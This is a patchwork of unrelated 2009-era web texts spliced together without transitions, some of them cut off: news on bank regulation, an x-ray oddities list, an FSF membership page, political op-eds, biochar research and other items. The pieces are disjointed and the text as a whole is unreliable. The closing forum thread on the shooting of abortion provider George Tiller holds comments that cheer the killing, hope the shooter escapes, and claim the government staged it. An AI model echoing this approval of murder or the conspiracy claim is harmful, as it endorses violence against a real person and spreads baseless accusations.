That conclusion became painfully obvious in the two faces of the financial crisis .
On one side , the federal government had to provide billions in aid — and on more than one occasion — to the likes of to Bank of America , Citigroup and the giant insurer AIG , which has its own lending unit , to prop them up .
On the other side , the failure of Lehman Brothers — which might have been averted with federal intervention — reverberated throughout the global economy .
Months later , the Obama administration and Congress now appear keenly focused on the dilemma and are expected to create legislation that will empower regulators to intervene in the affairs of big financial institutions and essentially wind down their operations in an orderly fashion with limited collateral damage to the economy .
Such authority would also apply to investment banks tirned bank holding companies , such as Goldman Sachs .
“ They need it and they ’ll get it , ” said Robert Glauber , who was a top Treasury official during the government rescue of the savings and loan industry two decades ago .
Regulatory reform is also likely to include new antitrust authority to block mega-mergers creating financial firms whose problems could adversely affect the overall system .
Analysts say , if that ’s the case , the government wo n’t want the too - big - to - fail companies of the past essentially hanging around .
Exactly how the government does that is unclear , but experts say there are ways without resorting to a heavy - handed approach such as nationalization .
“ If once there is some kind of coherent policy toward systemic risk , whomever is managing that policy can start to make life difficult for an entity that is too big to fail , ” says former S&L regulator and White House economist Lawrence White , at NYU ’s Stern School of Business .
“ It would n't upset if they were providing subtle nudges .
“ The Fed does n’t want them that big and might make them hold more capital , ” suggests Miller .
Some speculate that any further government aid to certain firms might come with such strings attached .
Others say a fresh look at regulation will help the process and unveil the complex , diverse and , at times , incompatible operations of the bank holding companies and their commercial bank subsidiaries .
“ They can't assess the risks of the big banks , ” says Frank Sorrentino , Chairman and CEO of North Jersey Community Bank , which recently acquired a failing bank in a transaction assisted by federal regulators at the FDIC .
Risk , or a disregard of risk , may also have factored into the decision - making of big bank executives , who assumed the too - big - to - fail doctrine would catch them if they fell , which the bailouts obviously did .
Small banks clearly have a financial interest in seeing the end of the big bank era , but that alone does n’t undercut their arguments .
In some cases it may be good for business , consumers and the overall marketplace .
" It ’s an appealing idea to our clients because it will make them more competitive , " says Robert C. Schwartz , a partner at Smith , Gambrell & Russell , which represents big and small banks in the Southeast .
“ Changes may leave gaps for the regional banks and the community banks . "
“ If the government does the right thing , it will be the private sector that forces these companies to do what they need to do for the benefit of their shareholders , ” says Sorrentino , whose bank has $ 400 million in assets .
( By contrasts , the 19 firms involved in the government ’s recently completed stress tests have assets of $ 100 - billion or more . )
Investors have clearly been focused on shrinking earnings and stock prices and what some consider diminished prospects for the future , even with a positive resolution to the financial crisis .
“ I also think investors are going to realize that they ’ll be low - single digit growth rates , ” says Miller
Some analysts say recent events highlight a fundamental problem that has been somewhat ignored for years ; the financial supermarket structure of the big institutions makes them difficult , if not , impossible to operate with great success .
“ Investors will say , That business unit hidden in there ; let 's spin that off , ” says Sorrentino .
“ Either the regulators are going to force it or the shareholders are going force it . ”
Top 10 bizarre x-ray images
X -RAY IMAGING
X -ray device is undoubtedly one of the most useful inventions of humanity .
It helps identify the different diseases and saving lives .
However this devices often can see all kind of things .
Sometimes X - ray is reliable evidence of human stupidity .
In this article we bring you 10 most bizarre X - ray images .
10 . Unusual toothache
A dentist found the source of the toothache Patrick Lawler
was complaining about on the roof of his mouth : a four - inch
( 10 - centimeter ) nail the construction worker had unknowingly
embedded in his skull six days earlier .
9 . Nails in the head
A nail gun shot six nails into construction worker Isidro Mejia’s
head during an April 2004 accident .
He not only survived but was
expected at the time to recover fully .
8. Bulb in colon
Doctors in Pakistan removed a whole lightbulb from a prisoner ’s
anus June 28 .
The man said he awoke with the problem , but
doctors were n’t sure .
7. Battery , spring , …
X-rays from Central Prison in Raleigh , N.C. , show items such as
bed springs and batteries that prisoners swallowed to gain trips
to outside hospitals .
6. Keys and forks
How can someone accidentally eat key or forks ??
5 . Dog that eat knives
4. Python who eat electrical blanket
Python Gulps Down Queen - Size Electric Blanket .
It took surgery to save
a 12 - foot Burmese python after it swallowed an entire queen - size
electric blanket – with the electrical cord and control box .
Veterinarians Karsten Fostvedt , above , and Barry Rathfon performed
the two - hour operation .
3 . Aline inside duck
An alien face seems to appear in the X - ray of a duck , which died
in May from injuries it had when found .
2. Operation succeed , scissors forgotten
A An 6 - inch pair of surgical scissors appears in the abdomen
of Australian Pat Skinner in April 2004 — 18 months after
her initial operation .
1. Real or fake boob ?
On 2004 , dutch actress Georgina Verbaan confounded critics
who doubted the authenticity of her mams by publishing
impressive x-ray profiles of the suspect assets on her website .
The results are conclusive proof that the 25 - year - old did not
surgically enhance her jubs in advance of a € 200,000 photo
shoot for the December issue of Dutch Playboy .
BONUS :
Hehe , no comment for this x-ray image 🙂
Goofs
After Dr.Weizak finds
Johnny 's new home and is invited inside , he begins to pull out medication from his bag .
Johnny stops him and Dr.Weizak puts the medication on the table and sits down .
In the next scene when he stands up again , the medication is gone .
See more
One of The Rarest Frogs in The World
This rare frog which is called purple frog was discovered for the first time in 2003 , in Western Ghats in India .
It is the one and only place where these species can be found .
The frog is really purple , has very small eyes , unusual nose and believed to be a relative of ancient frogs , that lived during the time of the dinosaurs .
Frankly , it looks rather strange , but sounds even worse !
CANADIAN and Australian cities account for six of the top ten spots in the Economist Intelligence Unit 's latest liveability ranking ( see full report ) .
All of the cities in the top ten scored well over 80.0 , the threshold below which difficulties are apparent in day - to - day living .
Vancouver is still the world 's most liveable city , with a rating of 98.0 ; Sydney and Zurich , sharing ninth place , achieved a score less than 2 % lower than Vancouver's .
The worst - performing locations are in Africa or Asia , where civil instability and poor infrastructure present significant challenges .
The unfolding political and economic crisis in Zimbabwe makes Harare the least desirable city in the survey .
Locations within Afghanistan and Iraq are not included .
The Economist Intelligence Unit 's liveability rating quantifies the challenges that might be presented to an individual 's lifestyle in 140 cities worldwide .
Each city is assigned a score for over 30 qualitative and quantitative factors across five broad categories : stability , health care , culture and environment , education , and infrastructure .
The categories are compiled and weighted to provide an overall rating of 1–100 , where 1 is considered intolerable and 100 is considered ideal .
This August , 5 2008 NASA image captured by the Hubble Space Telescope shows the elliptical galaxy M87 .
M87 is the home to several trillion stars , a supermassive black hole , and a family of 13,000 globular star clusters , located in the Virgo cluster of galaxies .
Space Globular star clusters are dense bunches of hundreds of thousands of stars and contain some of the oldest surviving stars in the Universe .
A new international study of globular clusters outside our Milky Way Galaxy has found evidence that these hardy pioneers are more likely to form in dense areas , where star birth occurs at a rapid rate , instead of uniformly from galaxy to galaxy .
( UPI Photo / NASA ) | License Photo
LEICESTER , England , July 1 ( UPI ) --
An international team of astronomers using the European Space Agency 's XMM - Newton X - ray observatory says it 's discovered a new kind of black hole .
The scientists , led by Sean Farrell of the University of Leicester , England , said the newly found black hole weighs more than 500 solar masses and is a missing link between lighter stellar - mass and heavier super - massive black holes .
Advertisement
Stellar - mass black holes about 3 to 20 times as massive as the sun , and super - massive black holes several million to several thousand million times as massive as the sun , have long been known to exist .
Because of the large gap between the two extremes , scientists have speculated the existence of a third , intermediate class of black holes , with masses between a hundred thousand and several hundred thousand solar masses .
Up until now , scientists were unable to confirm that this elusive intermediate class actually existed .
Farrell 's team was analyzing data obtained by XMM - Newton for neutron stars and white dwarves , when they stumbled upon the black hole .
Called HLX - 1 , it is located approximately 290 million light years from Earth .
The discovery will be detailed in the July 2 edition of the journal Nature .
Sustaining support of the FSF ( aka " warm inner glow " )
You can proudly proclaim that you are helping the FSF carry out its mission to promote and preserve software freedom .
You will receive an ultra slim , credit - card - sized , 4GB card loaded with Trisquel Live , a fully free GNU / Linux distribution .
The card sports an incredibly sturdy and durable double - sided USB connector and fits in a wallet , so you can take it anywhere - sharing GNU / Linux on the go !
Please note that the bootable membership cards are cost effective only if we print and send them out in batches .
Cards will go out every month .
Thanks in advance for your patience !
FSF member badge
Show the world you support software freedom by displaying your associate member badge for the whole world to see .
Email forwarding
Show the world you support free software !
Receive up to five email aliases in the member .
fsf.org domain to forward to other addresses .
( Email alias availability is not guaranteed ; aliases are given out on a first - come - first - served basis . )
Free entry to the LibrePlanet conference
All current associate members of the FSF are invited to attend the FSF 's annual conference held in Boston , Massachusetts , USA .
The conference is an opportunity for associate members and free software supporters to meet each other and discuss current issues with FSF staff and some members of the FSF 's Board of Directors .
20 % discount on FSF merchandise
You will receive a 20 % discount on all purchases in the FSF 's shop — we 've got plenty of books , t- shirts , and GNU gear to choose from !
To use your discount , simply log into your FSF account , and you 'll be taken to a page that explains the process .
Jitsi Meet access
Becoming an FSF member gives you access to our Jitsi Meet server for associate members , allowing you to have gratis videoconferencing with your friends , colleagues , and loved ones .
Associate members can start calls or conference rooms that anyone can join using the special URL .
We have taken great pains to maximize the privacy and freedom of your calls .
As you can expect from the FSF , and unlike other instances , our Jitsi Meet server does not distribute proprietary JavaScript .
It 's the perfect way to stay in touch without resorting to proprietary software .
Access to the Member Forum
The member forum is a great place to meet other free software activists , communicate directly with FSF staff , and suggest new directions and ideas for our campaigns for software freedom .
To access , simply log into your FSF account , and you 'll be entering a world of likeminded people .
5 % discount on hardware from ThinkPenguin
ThinkPenguin is a purveyor of computers and peripherals that provides 5 % off all their products to FSF members .
ThinkPenguin offers some devices that are certified by the FSF under our Respects Your Freedom hardware certification , and all of their products are able to run or interface with free GNU / Linux distributions .
Biannual FSF bulletin
The FSF publishes a compact tri-color bulletin twice a year to keep our members and donors informed of current FSF activities and efforts — sent to you via postal mail .
IRC cloak on Freenode
FSF members can receive an IRC cloak in the form fsf / member / username — please write to membership@fsf.org with your registered IRC nickname .
Use of an XMPP ( Jabber ) server
FSF members can use an XMPP ( Jabber ) server that is federated , enabling them to communicate with any other XMPP user , on our server or elsewhere .
Use your FSF username as the Jabber username , and member .fsf.org as the domain if your XMPP client supports server discovery via a DNS SRV record lookup .
Most XMPP clients support this .
If your client does not , you can use jabber.member.fsf.org as the server name .
Make sure to enable encryption : we support TLS on port 5222 only .
Your password is the same as your FSF member password .
( Please report any problems you might encounter to sysadmin@gnu.org . )
Digital Credit Union eligibility
FSF members in the US are eligible to join a credit union for their banking .
LibreOffice Certification
Previously available only to The Document Foundation members and active LibreOffice project members , this valuable professional certification has been an Associate Member benefit since 2017 .
Learn more about the certification .
Ask a friend or free software supporter to become an FSF member , to build a stronger movement !
A great way to contribute further is by talking with your friends and colleagues about our work to promote , protect , and develop free software -- in particular about becoming an FSF member .
The growth of the free software movement depends on members like you !
Tax deduction in the USA
Including crustaceans in animal welfare law could be a mistake ( Image : Steven David Miller / Nature Picture Library / Rex Features )
ANIMAL welfare legislation generally applies only to vertebrates .
There are , however , moves to include invertebrates .
Proposed changes to European law , for example , would extend welfare laws to crabs and lobsters .
Up to now the only invertebrate protected is the common octopus .
“ Invertebrate rights ” has become a campaigning issue .
Advocates for Animals recently produced a report which concludes that there is “ potential for experiencing pain and suffering ” in crustaceans .
The group is particularly concerned about boiling lobsters alive .
The …
U.S. Rep. Todd Tiahrt , R - Goddard , has a bill to repeal funding under the federal stimulus .
“ Thanks to unprecedented federal spending , we and our children are hundreds of billions of dollars in further debt to China , ” Tiahrt said .
Of Kansas ’ six - member congressional delegation , only U.S. Rep. Dennis Moore , D - Lenexa , whose district includes east Lawrence , voted for the $ 787 billion American Recovery and Reinvestment Act .
All five Republicans voted against it .
But Tiahrt , who is running for U.S. Senate , has ratcheted up the rhetoric , producing a campaign ad against the stimulus program that asks viewers to help him stop President Obama and House Speaker Nancy Pelosi .
State officials said without the stimulus funds , Kansas would be hurting worse .
Kansas , like many states , has used money from the stimulus to prop up its budget during the recession and a record drop - off in revenue .
In the recent legislative session , lawmakers cut the budget three times , and earlier this month Gov. Mark Parkinson administered another cut .
“ Without it ( federal stimulus funds ) , we would have had to cut much deeper , ” said Parkinson ’s budget director Duane Goossen .
Kansas will receive between $ 1.8 billion and $ 1.9 billion over three fiscal years under the federal stimulus plan .
And of the money coming to state government , most of that is going to help public schools , low - income Kansans get health care , higher education , road construction and the unemployed .
For example , in the current fiscal year ’s budget , which started July 1 , Kansas will receive approximately $ 200 million for Medicaid .
That meant that the state was able to use $ 200 million in state funding for other areas of the budget .
Without that federal money , state lawmakers would have had to either cut the budget , reduce services or raise taxes .
But with the national unemployment rate at 9.5 percent and expected to go higher , Obama ’s stimulus plan is coming under increasing criticism on two sides — those who think it was a waste of money , and those who say it was n’t enough and are hinting at a second stimulus plan .
On Thursday , Vice President Joe Biden visited Ohio , where Obama ’s poll numbers have dropped in recent days , to defend the administration ’s economic policies .
Camping is great fun .
I 've done a lot of it , but rarely in " proper " camp sites , with a bar , showers , toilet block , cafe , and all the rest of it .
The type of camping I 've mostly done is the middle - of - nowhere , roughing - it kind of outdoor life .
And nothing can compare .
I spent 10 weeks camping all over outer Mongolia , for example - from the Gobi desert , via the central - Mongolian grasslands , up to the northern Taiga forest , near Lake Hovsgol .
Camping in a place where you can see and hear not a single trace of humanity is a very special experience .
No roads , no buildings , no fences , no domesticated animals , and no people .
Most of Mongolia is like that , open and public land , with wild horses , camels , deer , and many other animals .
Spectacular as the experience was , digging a hole in the ground to go to the toilet , washing ( and swimming ) in rivers and lakes to get clean , going to bed when the sun sets , and cooking on a gas camping stove can get a bit tiresome .
Our camping experience was in 2000 .
Taking devices such as camping lights which needed batteries was n't much of an option - as well as being environmentally dodgy , there was no chance of charging batteries ( no electricity for weeks ) and throw - away batteries would have been both expensive and wasteful .
So we had a torch , a camping stove , and that was that .
Technology has moved on significantly since then , and there are some fantastic solar - powered camping kits which allow you to use the natural solar energy to have a warm shower , to cook , or to light up your evenings .
This article looks at some of those products , how they work , and which ones are more trouble than they are worth .
Solar powered camping has a great future !
Show me a person who cannot distinguish cleverness from wisdom , or a good brain from a good heart and I will show you somebody who is a fool .
These words to live by returned to mind a few weeks back when I read a complaint piece on Apocalypto by a scholar specializing in Mayan civilization .
She protested : “ They ’re shown as these extremely barbaric people , when in fact , the Maya were a very sophisticated culture . ”
A quote like this can only mean that , somewhere in higher education , impressionable minds are being formed by somebody who knows all about the Mayans , and nothing about elementary common sense .
For , of course , barbarism and sophistication are not mutually exclusive .
Hitler enjoyed Wagner .
SS troops in his death camps listened to great classical music to unwind after a hard day of slaughter .
Nazi Germany , Stalin ’s USSR , and Mao’s China were none of them Stone Age societies just past the level of bear skins and cave paintings .
They were all highly sophisticated , technologically accomplished , scientific civilizations with a developed literature , a huge legacy in the arts , law , philosophy and architecture , and an extremely complex and well - functioning governmental structure that enabled them to , among other things , handle the complex and difficult task of putting to death millions and millions of innocent people .
Indeed , the fact that civilizations can be both highly sophisticated and utterly barbaric is the whole point of the film .
How do such civilizations get that way ?
The scholar on Mayan civilization unwittingly points us to an important clue when she declares , “ It ’s offensive to those of us who try to teach cultural sensitivity and alternative world views that might not match our own 21st - century Western ones but are nonetheless valid … .
We have evidence to suggest that there were group sacrifices .
But it would probably have been done as a pious act with solemnity . ”
In the Dictatorship of Relativism that Pope Benedict warns against , tolerance tends to mutate into moral idiocy .
That ’s because the relativist is forced , by his own principles , to abandon the notion of the Good ( except in the sense of “ what I happen to like personally ” ) .
In the old days , it was possible to say that because God is Good and human beings are made in his image , then acts which respect the dignity of the human person are good and acts which do not are bad .
The goal of life was to “ approximate His perfections ” and to guard the fact that every person , no matter how poor or weak , was likewise a creature in His image .
So , for example , “ Liberty and Justice ” were good things , not just for rich robber barons , but for poor widows .
That was not “ imposing values ” .
It was “ defending the alien , the orphan , and the widow ” because the Lord their God was their special Friend and Avenger .
Of course , even people who professed to live in that moral universe did not always live up to their principles .
Such violations were called “ sin ” .
But when relativism is embraced , the first thing to go , of course , is a belief in God ’s goodness because God himself is a mere construct of Western culture .
The next thing to go is belief in human dignity .
After all , that is simply one more relic of a Christian civilization that has no more or less merit than any other .
And so , suggesting that group human sacrifice might be intrinsically evil is “ privileging 21st Century Western Culture ” .
All moral judgments — all attempts to condemn a particular act as evil ( such as , say , solemnly and piously cutting open an innocent man ’s chest while he breathes and ripping his heart out ) — are out .
We can not impose our values .
We cannot say that anybody “ ought ” to do anything , because that would imply we are subject to a Judge who blesses or condemns certain acts .
We must give up all pretense that “ God ” exists and that our duty in life is to approximate his perfection .
Our duty — our sole duty — is not to make value judgments .
The problem with all this , as C.S. Lewis points out , is that when all that says “ We ought ” is silenced , what says , “ I want ” remains , for it has no pretensions to transcendent authority .
It simply asserts naked force against the weak .
And so , once conscience is silenced by relativism , those without conscience will be only to happy to shout down all remaining opposition to their designs .
They may even cloak their worship of power as a kind of piety .
For as we have already seen , Nazi , Stalinist and Maoist civilizations also engaged in “ group sacrifice ” ( of extremely large groups ) and they too considered it a pious act of devotion to , variously , the Sacred Purity of the Volkish Blood and the Sacred Glory of the Proletariat .
Not that there ’s anything wrong with that .
Here 's the letter Steve Lonegan sent out that has been riling the Republican Party .
There 's a lot in it .
He 's certainly right about state Sen .
Tom Kean 's vote in favor of confirming Barry Albin to the state Supreme Court .
If Kean wants Albin and the other six judges to run the state , then he should resign and let someone else serve in the Senate .
As for the rest , read it in full and make up your own mind :
Why Principle Matters
By Steve Lonegan
Since the Primary Election , loyal Republicans have been baffled by the behavior of the GOP establishment in New Jersey .
First , operatives in the campaign of our nominee for Governor , Chris Christie , monkeyed around with the social issues page on his website , gaining the attention of the media before resolving what they caused .
Then , at the meeting of the Republican State Committee - the men and women elected from each county to formulate and advance the party 's principles - the party leadership blocked a move to formally adopt the platform of the national Republican Party , as well as blocking a resolution condemning Governor Corzine 's tax hikes .
At least one major newspaper , the Star - Ledger , linked the leadership 's refusal to adopt our Party 's platform to the fact it contains Pro-Life and Pro-Traditional Marriage planks .
The impact of not adopting the platform - a set of principles to guide the party and its elected officials - would soon manifest itself .
Just days later , Tom Kean Jr. , the Republican leader in the New Jersey State Senate , led a small group of Republicans in voting with liberal Democrats in support of the life - time confirmation of Supreme Court Justice Barry Albin to the state 's highest court .
Albin has been the state 's most liberal activist judge , authoring the radical Lewis vs. Harris decision in support of civil unions -- a decision that drastically alters the meaning of marriage and changes the course of our culture without voter input .
Albin is the architect of the left wing social engineering scheme known as COAH and the failed Abbott education funding mandates that have given New Jersey the highest property taxes in America .
The action of these Republicans was a slap in the face to their own nominee for Governor , who has promised to appoint " conservative judges who will uphold the Constitution " .
That same day , Senate Republican Leader Kean and his allies would rise alongside Jon Corzine to support another liberal scheme - the bonding of $ 400 million for " open space " .
No one opposes open space , but at a time when the state 's debt has reached crushing levels more debt simply is n't rational .
Lacking any platform , Republicans like Senator Kean have left themselves increasingly vulnerable to emotional , feel - good appeals .
Meanwhile , over at the Assembly , Republican Leader Alex DeCroce lobbied to pass a destructive COAH bill .
This legislation gives central planners in Trenton the power to override local mayors and councils and planning boards , forcing them to convert projects approved as " over - aged - 55 housing " to open housing as long as there is a 20 % low income housing component .
This bill shifts power to Trenton bureaucrats and developers ' lobbyists .
Republicans should be united behind defending home rule , but instead , without a guiding set of principles , they are lost .
But just when you thought it could n't get worse , along comes the vote on the largest tax increase in America 's history -- Barack Obama 's " Cap & Trade " scheme .
Only ten days after the failure of the New Jersey Republican State Committee to adopt the platform of the Republican Party , this tragic bill passed the House of Representatives by a narrow 219 to 212 , with eight Republicans joining 211 Democrats .
Our state had the dubious distinction of seeing three of those prosperity destroying votes cast by New Jersey Republican Congressmen Leonard Lance , Frank LoBiondo , and Chris Smith .
No other state in America saw so many Republicans vote with President Obama and the Democrats .
In New Jersey , three of our five Republican congressmen did .
To make matters worse , the Atlantic County Republican Committee sent out a release attacking those Republicans in Congress who stood up for taxpayers and came close to stopping President Obama , Speaker Pelosi , and their destructive legislation .
But it should come as no surprise that in a state where Republican leaders refuse to adopt Republican principles there is no semblance of principled leadership .
The question that haunts many of us is , " Why ? "
To understand how we got here , we need to look at who controls the levers of power within the GOP establishment in New Jersey .
For the most part , it 's not the elected officials .
In New Jersey , most elected officials are part - timers .
You must look behind the Republican " leader " - to the permanent bureaucracy who runs our legislative caucuses .
The players in this bureaucracy slide through a revolving door that takes them from legislative staffer , to lobbyist , to holder of government contracts or appointments , and then back in time to secure a fat taxpayer - funded pension .
These are the hollow men who are there when a freshmen legislator arrives in Trenton - and remain twenty years after he 's gone .
Only our party - the Republican Party - can bring change to Trenton .
The Democrats cannot bring the fiscal responsibility New Jersey needs .
They are captive of their own base vote - of public employee unions and those dependent on government .
They dare not risk their contract with these constituencies .
Republicans have a base vote who wants fiscal change .
It is the hollow men who reject it , and they do so for the simple reason that it is in their financial interests to maintain the status quo .
At the back of every seemingly inexplicable betrayal by a GOP " leader " sits a close personal advisor with his own personal reasons .
And in a state GOP without principles - that fails to adopt its own party platform - this kind of venal corruption is rampant .
That 's why it is so important for the New Jersey Republican State Committee to take a principled stand , adopt the party platform , and then use those principles when the hollow men come round with their personal agendas .
The surge in Afghanistan : I hate to say it , but maybe a little bit common sense ?
I certainly do n’t consider myself pro-war .
As a rule I ’m vehemently against any sort of invasion or occupation of a sovereign state .
You can bet that when the U.S. invaded Iraq I was one of the hundreds of thousands — or were we millions ?
I do n’t presume to be so optimistic — that took the streets in protest , and added my own CO2 to the worldwide sigh of relief at President Obama ’s announcement of troop withdrawal .
But like so many of my anti-war counterparts , joy over Obama ’s policy concerning Iraq was met with lamentations over his decision to not only continue the war in Afghanistan , but indeed to increase U.S. troop size and funding within the country .
I recently , however , had what for me is a very rare opportunity : the chance to have dinner with a Green Beret in training who allowed me to pick his brain on America ’s military policy towards the Middle East , and forced me hear a few things that my tree - hugging friends and I rarely discuss .
This young man in question had recently finished a year - long deployment in the eastern part of Afghanistan , an area notorious for continuous and brutal fighting .
While my answer to his stories of civilians caught in the cross - fire and dying comrades was for troops to get out ( and fast ) , he postulated that Obama ’s suggested surge is actually logical and necessary and will , despite short - term hardships , result in long - term peace for the country .
If NATO troops are already in the country , he suggested , than we might as well be in there sufficiently and get the job done , rather than simply prolong the suffering with no tangibly positive results .
Now I have difficulty believing that more military — and , by default , more fighting — is the answer to a current military quagmire .
But this Green Beret ’s is not alone in his support for the surge .
The most recent issue of The Economist ( I know — not exactly an anti-war publication ) also supports Obama ’s decision , and condemns Britain for under - supporting it ’s troops in the country and Canada for announcing it ’s imminent pull - out .
The logic remains the same : if NATO decided to go into Afghanistan , and if the U.S. and it ’s allies truly sees terrorism in the region as a threat , then by - golly ( as the Brits say ) do the job right , or do n’t do it at all .
Somehow , this argument kind of makes sense to me .
Am I becoming pro-war after all ?
Want the latest news from Swansea sent straight to your inbox ?
Do n't miss anything from your city !
Sign up for regular updates
Thank you for subscribing
We have more newsletters
Show me See our privacy notice Invalid Email
A PROCESS invented thousands of years ago by Amazonian Indians could play a key role in defeating global warming , experts in Wales claim today .
The scientists from Swansea University have established a research group to develop the little - known but potentially planet - saving product Biochar .
Biochar is made when vegetable waste is burned in the absence of oxygen , a process called pyrolysis .
The substance was first discovered in the Amazon where Indians used it to fertilise the rainforest ’s nutrient - poor soil , between 2,500 and 6,000 years ago .
It is an extremely good fertiliser , because it contains high levels of nutrients vital for plant growth , like nitrogen , phosphate , and calcium .
It is also highly porous , which helps soil retain water , and provides a solid environment for various microbes that are beneficial for plant growth .
Plus it locks carbon dioxide away , possibly for thousands of years .
Any biomass can yield biochar , including wood , as well as agricultural waste like hulls and stems .
To make the process even more environmentally friendly , pyrolysis also yields hydrocarbons , which can be made into bio -fuel .
The university ’s new multidisciplinary Biochar Research Team is now playing a major part in the substance ’s modern development .
The Sustainable Development Commission ( SDC ) has already dubbed biochar a “ breakthrough technology ” in tackling climate change .
Biochar Research Team member Dominic Woolf , an associate lecturer in sustainable development at Swansea University , said yesterday : “ Biochar is a technology that can remove greenhouse gases from the atmosphere at the same time as providing useful energy , improving soil fertility and reducing our reliance on fossil fuel - derived fertilisers .
“ Plant products that currently go to waste , such as agricultural and forestry residues , can be converted to charcoal with negligible harmful emissions , using a variety of well - established pyrolysis technologies .
“ If the resulting biochar is added to soil , it not only locks up carbon for centuries to millennia , but also improves soil fertility , moisture availability and crop growth .
“ The energy released during pyrolysis can be used for anything from providing heat for houses to electricity production .
“ In such a system , the more energy you produce , the more you reduce atmospheric greenhouse gas concentrations .
In effect , ‘ plant power ’ can be used to capture carbon dioxide from the atmosphere and store it in a stable solid form for years to come .
“ We are investigating how biochar can be integrated sustainably into a variety of different situations around the world – from domestic and community systems suited to less - developed countries to horticultural and municipal scale systems that may be useful closer to home . ”
The team is constructing a global model of the potential for reducing atmospheric levels of greenhouse gases by producing biochar sustainably .
It is also providing assistance to a recycling company that hopes to establish a pyrolysis plant in South Wales and conducting a pilot study into the physical and chemical changes that take place through time as biochar is weathered within the soil .
Jonathon Porritt , chairman of the Sustainable Development Commission , said : “ Biochar could be such an important technology in our fight against climate change that we ’ve included it in our list of breakthroughs for the 21st century .
“ It ’s great to hear of the exciting work being done in Swansea and it ’s yet another example of Wales taking an important role in securing a more sustainable future . ”
Alayne Street - Perrot , research professor of physical geography at Swansea and a member of the Biochar Research Team said : “ One particularly attractive feature is that biochar production can be carried out in both developed and developing countries , at all scales , from individual households to large modern plants that produce significant amounts of useful energy and heat . ”
Skip to comments .
Report : George Tiller Shot To Death [ Child Murderer Killed At Wichita Church ]
KMBC ^ | May 31 , 2009
Posted on by upchuck
WICHITA , Kan . -- Dr. George Tiller , a Kansas man who became one of the most famous figures in the national debate over abortion , was shot and killed at his church Sunday morning , KAKE - TV reported .
Tiller was walking into Reformation Lutheran Church at 10:03 a.m. , when he was shot .
Tiller was pronounced dead when emergency crews arrived , the station reported .
Police were looking for a blue Ford Taurus with a K - State vanity plate , license number 225 BAB .
Police described him as a white male in his 50's or 60's , 6 ' 1 , " 220 lbs , wearing a white shirt and dark pants .
TOPICS :
Constitution / Conservatism
Crime / Corruption
Culture / Society
News / Current Events
US : Kansas
KEYWORDS :
abortionists
babykiller
banglist
churchshooting
evilman
georgetiller
murder
shooting
tiller
wichita
Related :
http://www.freerepublic.com/focus/f-news/2261656/posts
http://www2.ljworld.com/news/2009/may/31/tiller-shot-death-wichita-church/?breaking
http://www.wibw.com/home/headlines/46575997.html
To : upchuck
Tiller has committed outrage after outrage and not only gotten away with it , he has made a fortune !
Sooner or later this had to happen .
To : upchuck
This is n't good , boys and girls .... not good at all .
This serial - killer piece of excrement will be held up by every abortionist and every lover of abortionists as the reason why the Secret Service needs to be assigned to guard every abortionist , every abortion mill and every lover of abortions in this country .
To : upchuck
Thou Shalt Not Murder .
Both the shooter and the victim will be judged .
SnakeDoc
by 4 posted onby SnakeDoctor ( " The night is darkest just before the dawn -- but I promise you , the dawn is coming . " -- Harvey Dent )
To : Gay State Conservative
You are entitled to your opinion .
To : upchuck
What goes around comes around ...
To : upchuck
Police have a suspect description .
The suspect is described as a white male in his 50’s or 60 ’s with grey hair that is balding in the middle .
He is about 6 ’ 1 ” and about 220 pounds and was wearing a white shirt and dark pants .
The suspect was last seen in a light blue Ford Taurus , possibly an early 1990 ’s model .
It has a K - State vanity plate and a Kansas license plate number 225 BAB .
Tiller was the victim of violence before .
On June 9 , 1986 someone detonated a homemade bomb on the roof of his Wichita clinic .
No one was hurt During the Summer of Mercy in 1991 , protesters blocked the entrance to his facility before a federal judge ruled the protesters be arrested .
Two years later , Dr. Tiller was shot outside his clinic the evening of August 19 , 1993 .
His wounds were not life threatening .
Abortion opponent Shelly Shannon was convicted of that shooting and sentenced to prison .
To : Gay State Conservative
One less nazi as far as I am concerned .
To : upchuck
Let ’s not assume this has anything to do with abortion .
Until I hear differently , I ’m going with a gay lovers ’ spat .
by 9 posted onby Sloth ( The Second Amendment is the ultimate " term limit . " )
To : Anti-Bubba182
Hope the guy gets away .
To : upchuck
What is sad is that abortion is the law of the land .
If you want one you can have one .
Over 40 million lives have been destroyed since Roe vs. Wade .....
by 11 posted onby SkyDancer ( ' Those who hammer their guns into plows will plow for those who do not ..' ~ Thomas Jefferson )
To : Gaffer
GSC has a valid point .
The second thought that went through my mind on 9/11/01 was : " What kind of laws will they pass now . "
by 12 posted onby ex91B10 ( " Search " and " Preview " are your friends ... )
To : Gay State Conservative
When I first read this , part of me wondered if some liberal is n’t secretly behind this to get just the outcome you have listed .
I used to not be so paranoid , until this surreal reality replaced what used to be .
Interesting the timing of this , as it was recently released that according to polls a majority of Americans are anti-abortion / pro-life .
Good way to discredit the movement and those beliefs - assassinate an abortionist .
by 13 posted onby IMissPresidentReagan ( What , were all the Judges who had a 100 % rate of being overturned by the Supreme Court already taken )
To : Turret Gunner A20
I doubt he does , but a jury could be lenient .
To : Gaffer
You are entitled to your opinion .
I 'm not weeping for the scumbag himself .
I have n't the fainest doubt that he is , at this very moment , rotting in the very special place in hell that he so richly earned .
What I 'm saying is that this will hurt the anti-abortion * cause *... and hurt it badly .
If you doubt me ... just watch .
To : upchuck
This will just be used to “ justify ” more gun control .
by 16 posted onby MichiganConservative ( $ 2 trillion in secret loans since late 2008 .
Audit the federal reserve .
Support HR 1207 . )
To : Anti-Bubba182
Pro-lifers should condemn this as antithetical to their philosophy and beliefs .
Hopefully , the perpetrator will be apprehended and prosecuted to the fullest extent of the law .
I will shed no tears that Teller is gone — but MURDER is MURDER .
Now , here ’s the “ reality check ” — ALL of us who “ cling to God and guns ” are about to be villified and lumped into the same category as this murderer , this killer , this “ terrorist . ”
COUNT ON IT .
The Obama Regime has JUST gotten ALL the help they need to confirm Sotomayor , and to begin the process of dismantling the 2nd Amendment and “ taking ” our guns , as well as restricting the “ free speech ” of Christians , Conservatives , and critics of all things Washington .
by 17 posted onby patriot preacher ( To be a good American Citizen and a Christian IS NOT a contradiction .
( www.mygration.blogspot.com))
To : upchuck
Could n’t you at least try to do a search ?
If so , you would have seen this posted just 9 threads down .
To : Gay State Conservative
“ This serial - killer piece of excrement will be held up by every ... ” ... gun-control nut in America as proof that dangerous people ( like foes of baby - killing ) should not be allowed to keep and bear arms .
by 19 posted onby dsc ( A man with an experience is never at the mercy of a man with an argument . )
To : Gay State Conservative
Obama is going to take advantage of this murder to sieze even more control over our society .
I would not even put it past them to commit this murder themselves , as an excuse to sieze power .
Reichstag Fire , and all that ...
